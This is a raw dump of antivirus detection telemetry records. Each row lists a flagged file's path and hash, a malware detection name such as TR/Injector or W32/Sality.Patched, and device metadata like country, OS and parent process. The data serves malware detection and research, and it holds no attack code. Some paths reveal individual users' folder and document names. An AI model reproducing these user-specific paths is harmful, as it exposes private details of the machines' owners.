  Row(detection=Row(filename='avscan-20181102-061709-e60b83c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061709-E60B83C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062624-3150e78b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062624-3150E78B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061110-105bd378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061110-105BD378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054904-f9e3c6c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054904-F9E3C6C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060326-fb87c0e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060326-FB87C0E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060839-b675a685', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060839-B675A685', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061142-236ddb70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061142-236DDB70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061926-37df4a34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061926-37DF4A34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054958-1a70c91a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054958-1A70C91A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-34356f64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-34356F64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062235-a898baf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062235-A898BAF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051717-897753b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051717-897753B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050645-10da463f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050645-10DA463F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055844-53bfdd1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055844-53BFDD1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051237-e27e40a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051237-E27E40A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060233-dc57bfe2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060233-DC57BFE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060610-5d8a374a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060610-5D8A374A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\74DE5DB7598D2BCB3AD2C23A84910509FB529233A76F0AA5AD243063F4FD94DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050648-129fe119', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050648-129FE119', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053450-fd406f41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053450-FD406F41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053853-8e049bff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053853-8E049BFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051123-b636d4a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051123-B636D4A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='text.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\TEXT\\TEXT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='79b8a0226397de22cf3c724a5eef818a7c5e675b9543dfe4c152b806144d6088', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051247-e8887945', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051247-E8887945', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052507-a15ed9e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052507-A15ED9E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='7e59ec1097acb9cbb852cf8ed34c754f9d8f2d9d27c6dd1ae4d718bd0a18dd15', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T07:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053348-d819e754', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053348-D819E754', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062601-23aa5730', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062601-23AA5730', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060129-b5cfe49b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060129-B5CFE49B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052536-b29233b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052536-B29233B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-20-16-02.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:21:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emboxui.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa12120.1415\\[danielniewold] embox\\emboxui.exe', filesize=10176000, name='HEUR/APC.#M1.#R1'), hash='1680e6f44bc0684691d7eebd1c1597c9c78c8e5bd021f3131a4e1b721298812c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2240728, timestamp='2018-11-01T20:43:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155440-3604c01e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155440-3604C01E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T15:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:24:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155329-a8663b49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155329-A8663B49', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:51:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:49:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151947-124fd41b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151446-E857F837\\AVSCAN-20181101-151947-124FD41B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110200-68cc8443', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105713-3526A361\\AVSCAN-20181101-110200-68CC8443', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154607-5deb9a17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154607-5DEB9A17', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:24:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh357e.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH357E.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193018-5f28a8cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-193018-5F28A8CC', filesize=428000, name='ADWARE/CrossRider.Gen7.#M1.#R1'), hash='42c1964b6c6193cb91a3c72614b2a3f641ed5d8d44919bc19e3138c57f83540e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pembuktian cap.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT INTERNAL\\Dokumentasi Pembuktian CAP\\Pembuktian CAP.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160231-03a4e4dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160231-03A4E4DD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:32Z'), dt=datetime.date(2018, 11, 1)),
